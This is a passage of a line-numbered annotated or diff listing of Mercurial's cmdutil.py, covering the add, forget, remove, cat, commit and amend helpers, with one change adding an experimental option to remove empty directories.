1926 # The slow path checks files modified in every changeset.
1927 # The slow path checks files modified in every changeset.
1927 # This is really slow on large repos, so compute the set lazily.
1928 # This is really slow on large repos, so compute the set lazily.
1928 class lazywantedset(object):
1929 class lazywantedset(object):
1929 def __init__(self):
1930 def __init__(self):
1930 self.set = set()
1931 self.set = set()
1931 self.revs = set(revs)
1932 self.revs = set(revs)
1932
1933
1933 # No need to worry about locality here because it will be accessed
1934 # No need to worry about locality here because it will be accessed
1934 # in the same order as the increasing window below.
1935 # in the same order as the increasing window below.
1935 def __contains__(self, value):
1936 def __contains__(self, value):
1936 if value in self.set:
1937 if value in self.set:
1937 return True
1938 return True
1938 elif not value in self.revs:
1939 elif not value in self.revs:
1939 return False
1940 return False
1940 else:
1941 else:
1941 self.revs.discard(value)
1942 self.revs.discard(value)
1942 ctx = change(value)
1943 ctx = change(value)
1943 matches = [f for f in ctx.files() if match(f)]
1944 matches = [f for f in ctx.files() if match(f)]
1944 if matches:
1945 if matches:
1945 fncache[value] = matches
1946 fncache[value] = matches
1946 self.set.add(value)
1947 self.set.add(value)
1947 return True
1948 return True
1948 return False
1949 return False
1949
1950
1950 def discard(self, value):
1951 def discard(self, value):
1951 self.revs.discard(value)
1952 self.revs.discard(value)
1952 self.set.discard(value)
1953 self.set.discard(value)
1953
1954
1954 wanted = lazywantedset()
1955 wanted = lazywantedset()
1955
1956
1956 # it might be worthwhile to do this in the iterator if the rev range
1957 # it might be worthwhile to do this in the iterator if the rev range
1957 # is descending and the prune args are all within that range
1958 # is descending and the prune args are all within that range
1958 for rev in opts.get('prune', ()):
1959 for rev in opts.get('prune', ()):
1959 rev = repo[rev].rev()
1960 rev = repo[rev].rev()
1960 ff = _followfilter(repo)
1961 ff = _followfilter(repo)
1961 stop = min(revs[0], revs[-1])
1962 stop = min(revs[0], revs[-1])
1962 for x in xrange(rev, stop - 1, -1):
1963 for x in xrange(rev, stop - 1, -1):
1963 if ff.match(x):
1964 if ff.match(x):
1964 wanted = wanted - [x]
1965 wanted = wanted - [x]
1965
1966
1966 # Now that wanted is correctly initialized, we can iterate over the
1967 # Now that wanted is correctly initialized, we can iterate over the
1967 # revision range, yielding only revisions in wanted.
1968 # revision range, yielding only revisions in wanted.
1968 def iterate():
1969 def iterate():
1969 if follow and match.always():
1970 if follow and match.always():
1970 ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
1971 ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
1971 def want(rev):
1972 def want(rev):
1972 return ff.match(rev) and rev in wanted
1973 return ff.match(rev) and rev in wanted
1973 else:
1974 else:
1974 def want(rev):
1975 def want(rev):
1975 return rev in wanted
1976 return rev in wanted
1976
1977
1977 it = iter(revs)
1978 it = iter(revs)
1978 stopiteration = False
1979 stopiteration = False
1979 for windowsize in increasingwindows():
1980 for windowsize in increasingwindows():
1980 nrevs = []
1981 nrevs = []
1981 for i in xrange(windowsize):
1982 for i in xrange(windowsize):
1982 rev = next(it, None)
1983 rev = next(it, None)
1983 if rev is None:
1984 if rev is None:
1984 stopiteration = True
1985 stopiteration = True
1985 break
1986 break
1986 elif want(rev):
1987 elif want(rev):
1987 nrevs.append(rev)
1988 nrevs.append(rev)
1988 for rev in sorted(nrevs):
1989 for rev in sorted(nrevs):
1989 fns = fncache.get(rev)
1990 fns = fncache.get(rev)
1990 ctx = change(rev)
1991 ctx = change(rev)
1991 if not fns:
1992 if not fns:
1992 def fns_generator():
1993 def fns_generator():
1993 if allfiles:
1994 if allfiles:
1994 fiter = iter(ctx)
1995 fiter = iter(ctx)
1995 else:
1996 else:
1996 fiter = ctx.files()
1997 fiter = ctx.files()
1997 for f in fiter:
1998 for f in fiter:
1998 if match(f):
1999 if match(f):
1999 yield f
2000 yield f
2000 fns = fns_generator()
2001 fns = fns_generator()
2001 prepare(ctx, fns)
2002 prepare(ctx, fns)
2002 for rev in nrevs:
2003 for rev in nrevs:
2003 yield change(rev)
2004 yield change(rev)
2004
2005
2005 if stopiteration:
2006 if stopiteration:
2006 break
2007 break
2007
2008
2008 return iterate()
2009 return iterate()
2009
2010
2010 def add(ui, repo, match, prefix, explicitonly, **opts):
2011 def add(ui, repo, match, prefix, explicitonly, **opts):
2011 join = lambda f: os.path.join(prefix, f)
2012 join = lambda f: os.path.join(prefix, f)
2012 bad = []
2013 bad = []
2013
2014
2014 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2015 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2015 names = []
2016 names = []
2016 wctx = repo[None]
2017 wctx = repo[None]
2017 cca = None
2018 cca = None
2018 abort, warn = scmutil.checkportabilityalert(ui)
2019 abort, warn = scmutil.checkportabilityalert(ui)
2019 if abort or warn:
2020 if abort or warn:
2020 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2021 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2021
2022
2022 badmatch = matchmod.badmatch(match, badfn)
2023 badmatch = matchmod.badmatch(match, badfn)
2023 dirstate = repo.dirstate
2024 dirstate = repo.dirstate
2024 # We don't want to just call wctx.walk here, since it would return a lot of
2025 # We don't want to just call wctx.walk here, since it would return a lot of
2025 # clean files, which we aren't interested in and takes time.
2026 # clean files, which we aren't interested in and takes time.
2026 for f in sorted(dirstate.walk(badmatch, subrepos=sorted(wctx.substate),
2027 for f in sorted(dirstate.walk(badmatch, subrepos=sorted(wctx.substate),
2027 unknown=True, ignored=False, full=False)):
2028 unknown=True, ignored=False, full=False)):
2028 exact = match.exact(f)
2029 exact = match.exact(f)
2029 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2030 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2030 if cca:
2031 if cca:
2031 cca(f)
2032 cca(f)
2032 names.append(f)
2033 names.append(f)
2033 if ui.verbose or not exact:
2034 if ui.verbose or not exact:
2034 ui.status(_('adding %s\n') % match.rel(f))
2035 ui.status(_('adding %s\n') % match.rel(f))
2035
2036
2036 for subpath in sorted(wctx.substate):
2037 for subpath in sorted(wctx.substate):
2037 sub = wctx.sub(subpath)
2038 sub = wctx.sub(subpath)
2038 try:
2039 try:
2039 submatch = matchmod.subdirmatcher(subpath, match)
2040 submatch = matchmod.subdirmatcher(subpath, match)
2040 if opts.get(r'subrepos'):
2041 if opts.get(r'subrepos'):
2041 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2042 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2042 else:
2043 else:
2043 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2044 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2044 except error.LookupError:
2045 except error.LookupError:
2045 ui.status(_("skipping missing subrepository: %s\n")
2046 ui.status(_("skipping missing subrepository: %s\n")
2046 % join(subpath))
2047 % join(subpath))
2047
2048
2048 if not opts.get(r'dry_run'):
2049 if not opts.get(r'dry_run'):
2049 rejected = wctx.add(names, prefix)
2050 rejected = wctx.add(names, prefix)
2050 bad.extend(f for f in rejected if f in match.files())
2051 bad.extend(f for f in rejected if f in match.files())
2051 return bad
2052 return bad
2052
2053
2053 def addwebdirpath(repo, serverpath, webconf):
2054 def addwebdirpath(repo, serverpath, webconf):
2054 webconf[serverpath] = repo.root
2055 webconf[serverpath] = repo.root
2055 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2056 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2056
2057
2057 for r in repo.revs('filelog("path:.hgsub")'):
2058 for r in repo.revs('filelog("path:.hgsub")'):
2058 ctx = repo[r]
2059 ctx = repo[r]
2059 for subpath in ctx.substate:
2060 for subpath in ctx.substate:
2060 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2061 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2061
2062
2062 def forget(ui, repo, match, prefix, explicitonly, dryrun, interactive):
2063 def forget(ui, repo, match, prefix, explicitonly, dryrun, interactive):
2063 if dryrun and interactive:
2064 if dryrun and interactive:
2064 raise error.Abort(_("cannot specify both --dry-run and --interactive"))
2065 raise error.Abort(_("cannot specify both --dry-run and --interactive"))
2065 join = lambda f: os.path.join(prefix, f)
2066 join = lambda f: os.path.join(prefix, f)
2066 bad = []
2067 bad = []
2067 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2068 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2068 wctx = repo[None]
2069 wctx = repo[None]
2069 forgot = []
2070 forgot = []
2070
2071
2071 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2072 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2072 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2073 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2073 if explicitonly:
2074 if explicitonly:
2074 forget = [f for f in forget if match.exact(f)]
2075 forget = [f for f in forget if match.exact(f)]
2075
2076
2076 for subpath in sorted(wctx.substate):
2077 for subpath in sorted(wctx.substate):
2077 sub = wctx.sub(subpath)
2078 sub = wctx.sub(subpath)
2078 try:
2079 try:
2079 submatch = matchmod.subdirmatcher(subpath, match)
2080 submatch = matchmod.subdirmatcher(subpath, match)
2080 subbad, subforgot = sub.forget(submatch, prefix, dryrun=dryrun,
2081 subbad, subforgot = sub.forget(submatch, prefix, dryrun=dryrun,
2081 interactive=interactive)
2082 interactive=interactive)
2082 bad.extend([subpath + '/' + f for f in subbad])
2083 bad.extend([subpath + '/' + f for f in subbad])
2083 forgot.extend([subpath + '/' + f for f in subforgot])
2084 forgot.extend([subpath + '/' + f for f in subforgot])
2084 except error.LookupError:
2085 except error.LookupError:
2085 ui.status(_("skipping missing subrepository: %s\n")
2086 ui.status(_("skipping missing subrepository: %s\n")
2086 % join(subpath))
2087 % join(subpath))
2087
2088
2088 if not explicitonly:
2089 if not explicitonly:
2089 for f in match.files():
2090 for f in match.files():
2090 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2091 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2091 if f not in forgot:
2092 if f not in forgot:
2092 if repo.wvfs.exists(f):
2093 if repo.wvfs.exists(f):
2093 # Don't complain if the exact case match wasn't given.
2094 # Don't complain if the exact case match wasn't given.
2094 # But don't do this until after checking 'forgot', so
2095 # But don't do this until after checking 'forgot', so
2095 # that subrepo files aren't normalized, and this op is
2096 # that subrepo files aren't normalized, and this op is
2096 # purely from data cached by the status walk above.
2097 # purely from data cached by the status walk above.
2097 if repo.dirstate.normalize(f) in repo.dirstate:
2098 if repo.dirstate.normalize(f) in repo.dirstate:
2098 continue
2099 continue
2099 ui.warn(_('not removing %s: '
2100 ui.warn(_('not removing %s: '
2100 'file is already untracked\n')
2101 'file is already untracked\n')
2101 % match.rel(f))
2102 % match.rel(f))
2102 bad.append(f)
2103 bad.append(f)
2103
2104
2104 if interactive:
2105 if interactive:
2105 responses = _('[Ynsa?]'
2106 responses = _('[Ynsa?]'
2106 '$$ &Yes, forget this file'
2107 '$$ &Yes, forget this file'
2107 '$$ &No, skip this file'
2108 '$$ &No, skip this file'
2108 '$$ &Skip remaining files'
2109 '$$ &Skip remaining files'
2109 '$$ Include &all remaining files'
2110 '$$ Include &all remaining files'
2110 '$$ &? (display help)')
2111 '$$ &? (display help)')
2111 for filename in forget[:]:
2112 for filename in forget[:]:
2112 r = ui.promptchoice(_('forget %s %s') % (filename, responses))
2113 r = ui.promptchoice(_('forget %s %s') % (filename, responses))
2113 if r == 4: # ?
2114 if r == 4: # ?
2114 while r == 4:
2115 while r == 4:
2115 for c, t in ui.extractchoices(responses)[1]:
2116 for c, t in ui.extractchoices(responses)[1]:
2116 ui.write('%s - %s\n' % (c, encoding.lower(t)))
2117 ui.write('%s - %s\n' % (c, encoding.lower(t)))
2117 r = ui.promptchoice(_('forget %s %s') % (filename,
2118 r = ui.promptchoice(_('forget %s %s') % (filename,
2118 responses))
2119 responses))
2119 if r == 0: # yes
2120 if r == 0: # yes
2120 continue
2121 continue
2121 elif r == 1: # no
2122 elif r == 1: # no
2122 forget.remove(filename)
2123 forget.remove(filename)
2123 elif r == 2: # Skip
2124 elif r == 2: # Skip
2124 fnindex = forget.index(filename)
2125 fnindex = forget.index(filename)
2125 del forget[fnindex:]
2126 del forget[fnindex:]
2126 break
2127 break
2127 elif r == 3: # All
2128 elif r == 3: # All
2128 break
2129 break
2129
2130
2130 for f in forget:
2131 for f in forget:
2131 if ui.verbose or not match.exact(f) or interactive:
2132 if ui.verbose or not match.exact(f) or interactive:
2132 ui.status(_('removing %s\n') % match.rel(f))
2133 ui.status(_('removing %s\n') % match.rel(f))
2133
2134
2134 if not dryrun:
2135 if not dryrun:
2135 rejected = wctx.forget(forget, prefix)
2136 rejected = wctx.forget(forget, prefix)
2136 bad.extend(f for f in rejected if f in match.files())
2137 bad.extend(f for f in rejected if f in match.files())
2137 forgot.extend(f for f in forget if f not in rejected)
2138 forgot.extend(f for f in forget if f not in rejected)
2138 return bad, forgot
2139 return bad, forgot
2139
2140
2140 def files(ui, ctx, m, fm, fmt, subrepos):
2141 def files(ui, ctx, m, fm, fmt, subrepos):
2141 ret = 1
2142 ret = 1
2142
2143
2143 for f in ctx.matches(m):
2144 for f in ctx.matches(m):
2144 fm.startitem()
2145 fm.startitem()
2145 if ui.verbose:
2146 if ui.verbose:
2146 fc = ctx[f]
2147 fc = ctx[f]
2147 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2148 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2148 fm.data(abspath=f)
2149 fm.data(abspath=f)
2149 fm.write('path', fmt, m.rel(f))
2150 fm.write('path', fmt, m.rel(f))
2150 ret = 0
2151 ret = 0
2151
2152
2152 for subpath in sorted(ctx.substate):
2153 for subpath in sorted(ctx.substate):
2153 submatch = matchmod.subdirmatcher(subpath, m)
2154 submatch = matchmod.subdirmatcher(subpath, m)
2154 if (subrepos or m.exact(subpath) or any(submatch.files())):
2155 if (subrepos or m.exact(subpath) or any(submatch.files())):
2155 sub = ctx.sub(subpath)
2156 sub = ctx.sub(subpath)
2156 try:
2157 try:
2157 recurse = m.exact(subpath) or subrepos
2158 recurse = m.exact(subpath) or subrepos
2158 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2159 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2159 ret = 0
2160 ret = 0
2160 except error.LookupError:
2161 except error.LookupError:
2161 ui.status(_("skipping missing subrepository: %s\n")
2162 ui.status(_("skipping missing subrepository: %s\n")
2162 % m.abs(subpath))
2163 % m.abs(subpath))
2163
2164
2164 return ret
2165 return ret
2165
2166
2166 def remove(ui, repo, m, prefix, after, force, subrepos, dryrun, warnings=None):
2167 def remove(ui, repo, m, prefix, after, force, subrepos, dryrun, warnings=None):
2167 join = lambda f: os.path.join(prefix, f)
2168 join = lambda f: os.path.join(prefix, f)
2168 ret = 0
2169 ret = 0
2169 s = repo.status(match=m, clean=True)
2170 s = repo.status(match=m, clean=True)
2170 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2171 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2171
2172
2172 wctx = repo[None]
2173 wctx = repo[None]
2173
2174
2174 if warnings is None:
2175 if warnings is None:
2175 warnings = []
2176 warnings = []
2176 warn = True
2177 warn = True
2177 else:
2178 else:
2178 warn = False
2179 warn = False
2179
2180
2180 subs = sorted(wctx.substate)
2181 subs = sorted(wctx.substate)
2181 progress = ui.makeprogress(_('searching'), total=len(subs),
2182 progress = ui.makeprogress(_('searching'), total=len(subs),
2182 unit=_('subrepos'))
2183 unit=_('subrepos'))
2183 for subpath in subs:
2184 for subpath in subs:
2184 submatch = matchmod.subdirmatcher(subpath, m)
2185 submatch = matchmod.subdirmatcher(subpath, m)
2185 if subrepos or m.exact(subpath) or any(submatch.files()):
2186 if subrepos or m.exact(subpath) or any(submatch.files()):
2186 progress.increment()
2187 progress.increment()
2187 sub = wctx.sub(subpath)
2188 sub = wctx.sub(subpath)
2188 try:
2189 try:
2189 if sub.removefiles(submatch, prefix, after, force, subrepos,
2190 if sub.removefiles(submatch, prefix, after, force, subrepos,
2190 dryrun, warnings):
2191 dryrun, warnings):
2191 ret = 1
2192 ret = 1
2192 except error.LookupError:
2193 except error.LookupError:
2193 warnings.append(_("skipping missing subrepository: %s\n")
2194 warnings.append(_("skipping missing subrepository: %s\n")
2194 % join(subpath))
2195 % join(subpath))
2195 progress.complete()
2196 progress.complete()
2196
2197
2197 # warn about failure to delete explicit files/dirs
2198 # warn about failure to delete explicit files/dirs
2198 deleteddirs = util.dirs(deleted)
2199 deleteddirs = util.dirs(deleted)
2199 files = m.files()
2200 files = m.files()
2200 progress = ui.makeprogress(_('deleting'), total=len(files),
2201 progress = ui.makeprogress(_('deleting'), total=len(files),
2201 unit=_('files'))
2202 unit=_('files'))
2202 for f in files:
2203 for f in files:
2203 def insubrepo():
2204 def insubrepo():
2204 for subpath in wctx.substate:
2205 for subpath in wctx.substate:
2205 if f.startswith(subpath + '/'):
2206 if f.startswith(subpath + '/'):
2206 return True
2207 return True
2207 return False
2208 return False
2208
2209
2209 progress.increment()
2210 progress.increment()
2210 isdir = f in deleteddirs or wctx.hasdir(f)
2211 isdir = f in deleteddirs or wctx.hasdir(f)
2211 if (f in repo.dirstate or isdir or f == '.'
2212 if (f in repo.dirstate or isdir or f == '.'
2212 or insubrepo() or f in subs):
2213 or insubrepo() or f in subs):
2213 continue
2214 continue
2214
2215
2215 if repo.wvfs.exists(f):
2216 if repo.wvfs.exists(f):
2216 if repo.wvfs.isdir(f):
2217 if repo.wvfs.isdir(f):
2217 warnings.append(_('not removing %s: no tracked files\n')
2218 warnings.append(_('not removing %s: no tracked files\n')
2218 % m.rel(f))
2219 % m.rel(f))
2219 else:
2220 else:
2220 warnings.append(_('not removing %s: file is untracked\n')
2221 warnings.append(_('not removing %s: file is untracked\n')
2221 % m.rel(f))
2222 % m.rel(f))
2222 # missing files will generate a warning elsewhere
2223 # missing files will generate a warning elsewhere
2223 ret = 1
2224 ret = 1
2224 progress.complete()
2225 progress.complete()
2225
2226
2226 if force:
2227 if force:
2227 list = modified + deleted + clean + added
2228 list = modified + deleted + clean + added
2228 elif after:
2229 elif after:
2229 list = deleted
2230 list = deleted
2230 remaining = modified + added + clean
2231 remaining = modified + added + clean
2231 progress = ui.makeprogress(_('skipping'), total=len(remaining),
2232 progress = ui.makeprogress(_('skipping'), total=len(remaining),
2232 unit=_('files'))
2233 unit=_('files'))
2233 for f in remaining:
2234 for f in remaining:
2234 progress.increment()
2235 progress.increment()
2235 if ui.verbose or (f in files):
2236 if ui.verbose or (f in files):
2236 warnings.append(_('not removing %s: file still exists\n')
2237 warnings.append(_('not removing %s: file still exists\n')
2237 % m.rel(f))
2238 % m.rel(f))
2238 ret = 1
2239 ret = 1
2239 progress.complete()
2240 progress.complete()
2240 else:
2241 else:
2241 list = deleted + clean
2242 list = deleted + clean
2242 progress = ui.makeprogress(_('skipping'),
2243 progress = ui.makeprogress(_('skipping'),
2243 total=(len(modified) + len(added)),
2244 total=(len(modified) + len(added)),
2244 unit=_('files'))
2245 unit=_('files'))
2245 for f in modified:
2246 for f in modified:
2246 progress.increment()
2247 progress.increment()
2247 warnings.append(_('not removing %s: file is modified (use -f'
2248 warnings.append(_('not removing %s: file is modified (use -f'
2248 ' to force removal)\n') % m.rel(f))
2249 ' to force removal)\n') % m.rel(f))
2249 ret = 1
2250 ret = 1
2250 for f in added:
2251 for f in added:
2251 progress.increment()
2252 progress.increment()
2252 warnings.append(_("not removing %s: file has been marked for add"
2253 warnings.append(_("not removing %s: file has been marked for add"
2253 " (use 'hg forget' to undo add)\n") % m.rel(f))
2254 " (use 'hg forget' to undo add)\n") % m.rel(f))
2254 ret = 1
2255 ret = 1
2255 progress.complete()
2256 progress.complete()
2256
2257
2257 list = sorted(list)
2258 list = sorted(list)
2258 progress = ui.makeprogress(_('deleting'), total=len(list),
2259 progress = ui.makeprogress(_('deleting'), total=len(list),
2259 unit=_('files'))
2260 unit=_('files'))
2260 for f in list:
2261 for f in list:
2261 if ui.verbose or not m.exact(f):
2262 if ui.verbose or not m.exact(f):
2262 progress.increment()
2263 progress.increment()
2263 ui.status(_('removing %s\n') % m.rel(f))
2264 ui.status(_('removing %s\n') % m.rel(f))
2264 progress.complete()
2265 progress.complete()
2265
2266
2266 if not dryrun:
2267 if not dryrun:
2267 with repo.wlock():
2268 with repo.wlock():
2268 if not after:
2269 if not after:
2269 for f in list:
2270 for f in list:
2270 if f in added:
2271 if f in added:
2271 continue # we never unlink added files on remove
2272 continue # we never unlink added files on remove
2272 repo.wvfs.unlinkpath(f, ignoremissing=True)
2273 rmdir = repo.ui.configbool('experimental',
2274 'removeemptydirs')
2275 repo.wvfs.unlinkpath(f, ignoremissing=True, rmdir=rmdir)
2273 repo[None].forget(list)
2276 repo[None].forget(list)
2274
2277
2275 if warn:
2278 if warn:
2276 for warning in warnings:
2279 for warning in warnings:
2277 ui.warn(warning)
2280 ui.warn(warning)
2278
2281
2279 return ret
2282 return ret
2280
2283
2281 def _updatecatformatter(fm, ctx, matcher, path, decode):
2284 def _updatecatformatter(fm, ctx, matcher, path, decode):
2282 """Hook for adding data to the formatter used by ``hg cat``.
2285 """Hook for adding data to the formatter used by ``hg cat``.
2283
2286
2284 Extensions (e.g., lfs) can wrap this to inject keywords/data, but must call
2287 Extensions (e.g., lfs) can wrap this to inject keywords/data, but must call
2285 this method first."""
2288 this method first."""
2286 data = ctx[path].data()
2289 data = ctx[path].data()
2287 if decode:
2290 if decode:
2288 data = ctx.repo().wwritedata(path, data)
2291 data = ctx.repo().wwritedata(path, data)
2289 fm.startitem()
2292 fm.startitem()
2290 fm.write('data', '%s', data)
2293 fm.write('data', '%s', data)
2291 fm.data(abspath=path, path=matcher.rel(path))
2294 fm.data(abspath=path, path=matcher.rel(path))
2292
2295
2293 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2296 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2294 err = 1
2297 err = 1
2295 opts = pycompat.byteskwargs(opts)
2298 opts = pycompat.byteskwargs(opts)
2296
2299
2297 def write(path):
2300 def write(path):
2298 filename = None
2301 filename = None
2299 if fntemplate:
2302 if fntemplate:
2300 filename = makefilename(ctx, fntemplate,
2303 filename = makefilename(ctx, fntemplate,
2301 pathname=os.path.join(prefix, path))
2304 pathname=os.path.join(prefix, path))
2302 # attempt to create the directory if it does not already exist
2305 # attempt to create the directory if it does not already exist
2303 try:
2306 try:
2304 os.makedirs(os.path.dirname(filename))
2307 os.makedirs(os.path.dirname(filename))
2305 except OSError:
2308 except OSError:
2306 pass
2309 pass
2307 with formatter.maybereopen(basefm, filename) as fm:
2310 with formatter.maybereopen(basefm, filename) as fm:
2308 _updatecatformatter(fm, ctx, matcher, path, opts.get('decode'))
2311 _updatecatformatter(fm, ctx, matcher, path, opts.get('decode'))
2309
2312
2310 # Automation often uses hg cat on single files, so special case it
2313 # Automation often uses hg cat on single files, so special case it
2311 # for performance to avoid the cost of parsing the manifest.
2314 # for performance to avoid the cost of parsing the manifest.
2312 if len(matcher.files()) == 1 and not matcher.anypats():
2315 if len(matcher.files()) == 1 and not matcher.anypats():
2313 file = matcher.files()[0]
2316 file = matcher.files()[0]
2314 mfl = repo.manifestlog
2317 mfl = repo.manifestlog
2315 mfnode = ctx.manifestnode()
2318 mfnode = ctx.manifestnode()
2316 try:
2319 try:
2317 if mfnode and mfl[mfnode].find(file)[0]:
2320 if mfnode and mfl[mfnode].find(file)[0]:
2318 scmutil.prefetchfiles(repo, [ctx.rev()], matcher)
2321 scmutil.prefetchfiles(repo, [ctx.rev()], matcher)
2319 write(file)
2322 write(file)
2320 return 0
2323 return 0
2321 except KeyError:
2324 except KeyError:
2322 pass
2325 pass
2323
2326
2324 scmutil.prefetchfiles(repo, [ctx.rev()], matcher)
2327 scmutil.prefetchfiles(repo, [ctx.rev()], matcher)
2325
2328
2326 for abs in ctx.walk(matcher):
2329 for abs in ctx.walk(matcher):
2327 write(abs)
2330 write(abs)
2328 err = 0
2331 err = 0
2329
2332
2330 for subpath in sorted(ctx.substate):
2333 for subpath in sorted(ctx.substate):
2331 sub = ctx.sub(subpath)
2334 sub = ctx.sub(subpath)
2332 try:
2335 try:
2333 submatch = matchmod.subdirmatcher(subpath, matcher)
2336 submatch = matchmod.subdirmatcher(subpath, matcher)
2334
2337
2335 if not sub.cat(submatch, basefm, fntemplate,
2338 if not sub.cat(submatch, basefm, fntemplate,
2336 os.path.join(prefix, sub._path),
2339 os.path.join(prefix, sub._path),
2337 **pycompat.strkwargs(opts)):
2340 **pycompat.strkwargs(opts)):
2338 err = 0
2341 err = 0
2339 except error.RepoLookupError:
2342 except error.RepoLookupError:
2340 ui.status(_("skipping missing subrepository: %s\n")
2343 ui.status(_("skipping missing subrepository: %s\n")
2341 % os.path.join(prefix, subpath))
2344 % os.path.join(prefix, subpath))
2342
2345
2343 return err
2346 return err
2344
2347
2345 def commit(ui, repo, commitfunc, pats, opts):
2348 def commit(ui, repo, commitfunc, pats, opts):
2346 '''commit the specified files or all outstanding changes'''
2349 '''commit the specified files or all outstanding changes'''
2347 date = opts.get('date')
2350 date = opts.get('date')
2348 if date:
2351 if date:
2349 opts['date'] = dateutil.parsedate(date)
2352 opts['date'] = dateutil.parsedate(date)
2350 message = logmessage(ui, opts)
2353 message = logmessage(ui, opts)
2351 matcher = scmutil.match(repo[None], pats, opts)
2354 matcher = scmutil.match(repo[None], pats, opts)
2352
2355
2353 dsguard = None
2356 dsguard = None
2354 # extract addremove carefully -- this function can be called from a command
2357 # extract addremove carefully -- this function can be called from a command
2355 # that doesn't support addremove
2358 # that doesn't support addremove
2356 if opts.get('addremove'):
2359 if opts.get('addremove'):
2357 dsguard = dirstateguard.dirstateguard(repo, 'commit')
2360 dsguard = dirstateguard.dirstateguard(repo, 'commit')
2358 with dsguard or util.nullcontextmanager():
2361 with dsguard or util.nullcontextmanager():
2359 if dsguard:
2362 if dsguard:
2360 if scmutil.addremove(repo, matcher, "", opts) != 0:
2363 if scmutil.addremove(repo, matcher, "", opts) != 0:
2361 raise error.Abort(
2364 raise error.Abort(
2362 _("failed to mark all new/missing files as added/removed"))
2365 _("failed to mark all new/missing files as added/removed"))
2363
2366
2364 return commitfunc(ui, repo, message, matcher, opts)
2367 return commitfunc(ui, repo, message, matcher, opts)
2365
2368
2366 def samefile(f, ctx1, ctx2):
2369 def samefile(f, ctx1, ctx2):
2367 if f in ctx1.manifest():
2370 if f in ctx1.manifest():
2368 a = ctx1.filectx(f)
2371 a = ctx1.filectx(f)
2369 if f in ctx2.manifest():
2372 if f in ctx2.manifest():
2370 b = ctx2.filectx(f)
2373 b = ctx2.filectx(f)
2371 return (not a.cmp(b)
2374 return (not a.cmp(b)
2372 and a.flags() == b.flags())
2375 and a.flags() == b.flags())
2373 else:
2376 else:
2374 return False
2377 return False
2375 else:
2378 else:
2376 return f not in ctx2.manifest()
2379 return f not in ctx2.manifest()
2377
2380
2378 def amend(ui, repo, old, extra, pats, opts):
2381 def amend(ui, repo, old, extra, pats, opts):
2379 # avoid cycle context -> subrepo -> cmdutil
2382 # avoid cycle context -> subrepo -> cmdutil
2380 from . import context
2383 from . import context
2381
2384
2382 # amend will reuse the existing user if not specified, but the obsolete
2385 # amend will reuse the existing user if not specified, but the obsolete
2383 # marker creation requires that the current user's name is specified.
2386 # marker creation requires that the current user's name is specified.
2384 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2387 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2385 ui.username() # raise exception if username not set
2388 ui.username() # raise exception if username not set
2386
2389
2387 ui.note(_('amending changeset %s\n') % old)
2390 ui.note(_('amending changeset %s\n') % old)
2388 base = old.p1()
2391 base = old.p1()
2389
2392
2390 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2393 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2391 # Participating changesets:
2394 # Participating changesets:
2392 #
2395 #
2393 # wctx o - workingctx that contains changes from working copy
2396 # wctx o - workingctx that contains changes from working copy
2394 # | to go into amending commit
2397 # | to go into amending commit
2395 # |
2398 # |
2396 # old o - changeset to amend
2399 # old o - changeset to amend
2397 # |
2400 # |
2398 # base o - first parent of the changeset to amend
2401 # base o - first parent of the changeset to amend
2399 wctx = repo[None]
2402 wctx = repo[None]
2400
2403
2401 # Copy to avoid mutating input
2404 # Copy to avoid mutating input
2402 extra = extra.copy()
2405 extra = extra.copy()
2403 # Update extra dict from amended commit (e.g. to preserve graft
2406 # Update extra dict from amended commit (e.g. to preserve graft
2404 # source)
2407 # source)
2405 extra.update(old.extra())
2408 extra.update(old.extra())
2406
2409
2407 # Also update it from the from the wctx
2410 # Also update it from the from the wctx
2408 extra.update(wctx.extra())
2411 extra.update(wctx.extra())
2409
2412
2410 user = opts.get('user') or old.user()
2413 user = opts.get('user') or old.user()
2411 date = opts.get('date') or old.date()
2414 date = opts.get('date') or old.date()
2412
2415
2413 # Parse the date to allow comparison between date and old.date()
2416 # Parse the date to allow comparison between date and old.date()
2414 date = dateutil.parsedate(date)
2417 date = dateutil.parsedate(date)
2415
2418
2416 if len(old.parents()) > 1:
2419 if len(old.parents()) > 1:
2417 # ctx.files() isn't reliable for merges, so fall back to the
2420 # ctx.files() isn't reliable for merges, so fall back to the
2418 # slower repo.status() method
2421 # slower repo.status() method
2419 files = set([fn for st in repo.status(base, old)[:3]
2422 files = set([fn for st in repo.status(base, old)[:3]
2420 for fn in st])
2423 for fn in st])
2421 else:
2424 else:
2422 files = set(old.files())
2425 files = set(old.files())
2423
2426
2424 # add/remove the files to the working copy if the "addremove" option
2427 # add/remove the files to the working copy if the "addremove" option
